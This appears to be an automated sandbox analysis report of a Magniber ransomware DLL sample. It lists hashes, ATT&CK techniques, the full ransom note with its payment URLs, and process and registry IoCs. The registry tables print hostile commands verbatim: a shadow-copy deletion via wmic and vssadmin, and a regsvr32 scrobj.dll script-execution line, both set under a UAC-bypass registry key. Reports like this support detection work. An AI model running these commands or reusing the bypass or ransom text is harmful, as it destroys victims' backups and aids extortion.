magniber | 20e29bfcd2d3372af66eec996bcbc0babbeb8bc36b6a3edcd3afc70782aaea2e

Analysis

max time kernel
149s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
05-12-2024 10:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c752934305e1b89f82798ea2c26f70b3_JaffaCakes118.dll
Size

20KB
MD5

c752934305e1b89f82798ea2c26f70b3
SHA1

d5034027ea79146d7597542d0b9ae040ec632e18
SHA256

20e29bfcd2d3372af66eec996bcbc0babbeb8bc36b6a3edcd3afc70782aaea2e
SHA512

ad52c0b638770999fa9de9242161e3d8b30cfa9a66ce34d6dc870b47cf1a9479a76ea04b556affddcfbdb8bf229e488a9fb2a3c5d225df58cdb467c57c2ed179
SSDEEP

384:ebYQedPt/jViMyZXH8N2hjpzge669ZrzGYzPbJBn9JTpXJYDd4Pm3ixs0xsSBB/q:UYtNt74f62hjN79B9Jh9J1+DaP2gBhb

Score

10^/10

magniber defense_evasion discovery execution impact ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Pictures\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://2cc03a300254d290c0diteiyb.m647u2xsjtlfyzuevlxjiiwjsg2btyhmbxbjz4in4hm76u6hjzc62wad.onion/diteiyb Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://2cc03a300254d290c0diteiyb.topsaid.site/diteiyb http://2cc03a300254d290c0diteiyb.gosmark.space/diteiyb http://2cc03a300254d290c0diteiyb.iecard.top/diteiyb http://2cc03a300254d290c0diteiyb.ourunit.xyz/diteiyb Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://2cc03a300254d290c0diteiyb.m647u2xsjtlfyzuevlxjiiwjsg2btyhmbxbjz4in4hm76u6hjzc62wad.onion/diteiyb

http://2cc03a300254d290c0diteiyb.topsaid.site/diteiyb

http://2cc03a300254d290c0diteiyb.gosmark.space/diteiyb

http://2cc03a300254d290c0diteiyb.iecard.top/diteiyb

http://2cc03a300254d290c0diteiyb.ourunit.xyz/diteiyb

Signatures

Detect magniber ransomware 1 IoCs

resource	yara_rule
behavioral2/memory/2196-0-0x000001FA1EE00000-0x000001FA1F091000-memory.dmp	family_magniber

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber
Magniber family
magniber

Process spawned unexpected child process 50 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1736	1464	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4940	1464	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2024	1464	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4432	1464	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2364	1464	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3952	1464	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1072	1464	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1660	1464	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3552	1464	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2632	1464	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5168	1464	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5184	1464	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5204	1464	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5744	1464	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5780	1464	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5880	1464	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5872	1464	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6020	1464	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3276	1464	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5240	1464	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5184	1464	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5216	1464	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5680	1464	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6068	1464	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2224	1464	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1196	1464	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5240	1464	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4852	1464	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5648	1464	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5312	1464	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5712	1464	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6024	1464	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6092	1464	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1728	1464	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	376	1464	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5908	1464	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5544	1464	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5716	1464	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6088	1464	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5160	1464	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4912	1464	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4356	1464	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5196	1464	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4184	1464	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5988	1464	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5604	1464	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3376	1464	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2880	1464	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	728	1464	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5164	1464	vssadmin.exe	88

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Renames multiple (72) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Suspicious use of SetThreadContext 13 IoCs

description	pid	Process	procid_target
PID 2196 set thread context of 2868	2196	rundll32.exe	49
PID 2196 set thread context of 2924	2196	rundll32.exe	50
PID 2196 set thread context of 2068	2196	rundll32.exe	52
PID 2196 set thread context of 3408	2196	rundll32.exe	56
PID 2196 set thread context of 3544	2196	rundll32.exe	57
PID 2196 set thread context of 3740	2196	rundll32.exe	58
PID 2196 set thread context of 3832	2196	rundll32.exe	59
PID 2196 set thread context of 3896	2196	rundll32.exe	60
PID 2196 set thread context of 3988	2196	rundll32.exe	61
PID 2196 set thread context of 4172	2196	rundll32.exe	62
PID 2196 set thread context of 3844	2196	rundll32.exe	74
PID 2196 set thread context of 3696	2196	rundll32.exe	76
PID 2196 set thread context of 3008	2196	rundll32.exe	81

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Interacts with shadow copies 3 TTPs 30 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
1736	vssadmin.exe
6020	vssadmin.exe
3276	vssadmin.exe
5160	vssadmin.exe
728	vssadmin.exe
5240	vssadmin.exe
1196	vssadmin.exe
5712	vssadmin.exe
5716	vssadmin.exe
4184	vssadmin.exe
5604	vssadmin.exe
5168	vssadmin.exe
5648	vssadmin.exe
5544	vssadmin.exe
5744	vssadmin.exe
5184	vssadmin.exe
5312	vssadmin.exe
1728	vssadmin.exe
5988	vssadmin.exe
5164	vssadmin.exe
4432	vssadmin.exe
2364	vssadmin.exe
2632	vssadmin.exe
3952	vssadmin.exe
5880	vssadmin.exe
4912	vssadmin.exe
3552	vssadmin.exe
6068	vssadmin.exe
2224	vssadmin.exe
6088	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	Explorer.EXE

Modifies registry class 50 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command	TextInputHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	taskhostw.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	DllHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	taskhostw.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command	DllHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command	StartMenuExperienceHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1"	sihost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	DllHost.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command	sihost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	sihost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	DllHost.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command	svchost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	svchost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
2996	notepad.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
2196	rundll32.exe
2196	rundll32.exe
4768	msedge.exe
4768	msedge.exe
3800	msedge.exe
3800	msedge.exe
4028	identity_helper.exe
4028	identity_helper.exe
2840	msedge.exe
2840	msedge.exe
2840	msedge.exe
2840	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
3408	Explorer.EXE
2068	taskhostw.exe

Suspicious behavior: MapViewOfSection 13 IoCs

pid	Process
2196	rundll32.exe
2196	rundll32.exe
2196	rundll32.exe
2196	rundll32.exe
2196	rundll32.exe
2196	rundll32.exe
2196	rundll32.exe
2196	rundll32.exe
2196	rundll32.exe
2196	rundll32.exe
2196	rundll32.exe
2196	rundll32.exe
2196	rundll32.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

pid	Process
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	4376	wmic.exe
Token: SeSecurityPrivilege	4376	wmic.exe
Token: SeTakeOwnershipPrivilege	4376	wmic.exe
Token: SeLoadDriverPrivilege	4376	wmic.exe
Token: SeSystemProfilePrivilege	4376	wmic.exe
Token: SeSystemtimePrivilege	4376	wmic.exe
Token: SeProfSingleProcessPrivilege	4376	wmic.exe
Token: SeIncBasePriorityPrivilege	4376	wmic.exe
Token: SeCreatePagefilePrivilege	4376	wmic.exe
Token: SeBackupPrivilege	4376	wmic.exe
Token: SeRestorePrivilege	4376	wmic.exe
Token: SeShutdownPrivilege	4376	wmic.exe
Token: SeDebugPrivilege	4376	wmic.exe
Token: SeSystemEnvironmentPrivilege	4376	wmic.exe
Token: SeRemoteShutdownPrivilege	4376	wmic.exe
Token: SeUndockPrivilege	4376	wmic.exe
Token: SeManageVolumePrivilege	4376	wmic.exe
Token: 33	4376	wmic.exe
Token: 34	4376	wmic.exe
Token: 35	4376	wmic.exe
Token: 36	4376	wmic.exe
Token: SeIncreaseQuotaPrivilege	2788	WMIC.exe
Token: SeSecurityPrivilege	2788	WMIC.exe
Token: SeTakeOwnershipPrivilege	2788	WMIC.exe
Token: SeLoadDriverPrivilege	2788	WMIC.exe
Token: SeSystemProfilePrivilege	2788	WMIC.exe
Token: SeSystemtimePrivilege	2788	WMIC.exe
Token: SeProfSingleProcessPrivilege	2788	WMIC.exe
Token: SeIncBasePriorityPrivilege	2788	WMIC.exe
Token: SeCreatePagefilePrivilege	2788	WMIC.exe
Token: SeBackupPrivilege	2788	WMIC.exe
Token: SeRestorePrivilege	2788	WMIC.exe
Token: SeShutdownPrivilege	2788	WMIC.exe
Token: SeDebugPrivilege	2788	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2788	WMIC.exe
Token: SeRemoteShutdownPrivilege	2788	WMIC.exe
Token: SeUndockPrivilege	2788	WMIC.exe
Token: SeManageVolumePrivilege	2788	WMIC.exe
Token: 33	2788	WMIC.exe
Token: 34	2788	WMIC.exe
Token: 35	2788	WMIC.exe
Token: 36	2788	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4376	wmic.exe
Token: SeSecurityPrivilege	4376	wmic.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe
3800	msedge.exe

Suspicious use of UnmapMainImage 2 IoCs

pid	Process
3696	RuntimeBroker.exe
4172	RuntimeBroker.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2924 wrote to memory of 2996	2924	svchost.exe	96
PID 2924 wrote to memory of 2996	2924	svchost.exe	96
PID 2924 wrote to memory of 2860	2924	svchost.exe	97
PID 2924 wrote to memory of 2860	2924	svchost.exe	97
PID 2924 wrote to memory of 4376	2924	svchost.exe	98
PID 2924 wrote to memory of 4376	2924	svchost.exe	98
PID 2924 wrote to memory of 4852	2924	svchost.exe	99
PID 2924 wrote to memory of 4852	2924	svchost.exe	99
PID 2924 wrote to memory of 368	2924	svchost.exe	100
PID 2924 wrote to memory of 368	2924	svchost.exe	100
PID 368 wrote to memory of 2788	368	cmd.exe	105
PID 368 wrote to memory of 2788	368	cmd.exe	105
PID 4852 wrote to memory of 4628	4852	cmd.exe	133
PID 4852 wrote to memory of 4628	4852	cmd.exe	133
PID 4940 wrote to memory of 2028	4940	cmd.exe	194
PID 4940 wrote to memory of 2028	4940	cmd.exe	194
PID 2860 wrote to memory of 3800	2860	cmd.exe	119
PID 2860 wrote to memory of 3800	2860	cmd.exe	119
PID 2024 wrote to memory of 4816	2024	cmd.exe	118
PID 2024 wrote to memory of 4816	2024	cmd.exe	118
PID 2196 wrote to memory of 4048	2196	rundll32.exe	121
PID 2196 wrote to memory of 4048	2196	rundll32.exe	121
PID 2196 wrote to memory of 4936	2196	rundll32.exe	122
PID 2196 wrote to memory of 4936	2196	rundll32.exe	122
PID 2196 wrote to memory of 5060	2196	rundll32.exe	124
PID 2196 wrote to memory of 5060	2196	rundll32.exe	124
PID 3800 wrote to memory of 4656	3800	msedge.exe	127
PID 3800 wrote to memory of 4656	3800	msedge.exe	127
PID 2028 wrote to memory of 1176	2028	ComputerDefaults.exe	128
PID 2028 wrote to memory of 1176	2028	ComputerDefaults.exe	128
PID 4816 wrote to memory of 3580	4816	ComputerDefaults.exe	130
PID 4816 wrote to memory of 3580	4816	ComputerDefaults.exe	130
PID 4936 wrote to memory of 2772	4936	cmd.exe	134
PID 4936 wrote to memory of 2772	4936	cmd.exe	134
PID 5060 wrote to memory of 8	5060	cmd.exe	135
PID 5060 wrote to memory of 8	5060	cmd.exe	135
PID 3800 wrote to memory of 3892	3800	msedge.exe	142
PID 3800 wrote to memory of 3892	3800	msedge.exe	142
PID 3800 wrote to memory of 3892	3800	msedge.exe	142
PID 3800 wrote to memory of 3892	3800	msedge.exe	142
PID 3800 wrote to memory of 3892	3800	msedge.exe	142
PID 3800 wrote to memory of 3892	3800	msedge.exe	142
PID 3800 wrote to memory of 3892	3800	msedge.exe	142
PID 3800 wrote to memory of 3892	3800	msedge.exe	142
PID 3800 wrote to memory of 3892	3800	msedge.exe	142
PID 3800 wrote to memory of 3892	3800	msedge.exe	142
PID 3800 wrote to memory of 3892	3800	msedge.exe	142
PID 3800 wrote to memory of 3892	3800	msedge.exe	142
PID 3800 wrote to memory of 3892	3800	msedge.exe	142
PID 3800 wrote to memory of 3892	3800	msedge.exe	142
PID 3800 wrote to memory of 3892	3800	msedge.exe	142
PID 3800 wrote to memory of 3892	3800	msedge.exe	142
PID 3800 wrote to memory of 3892	3800	msedge.exe	142
PID 3800 wrote to memory of 3892	3800	msedge.exe	142
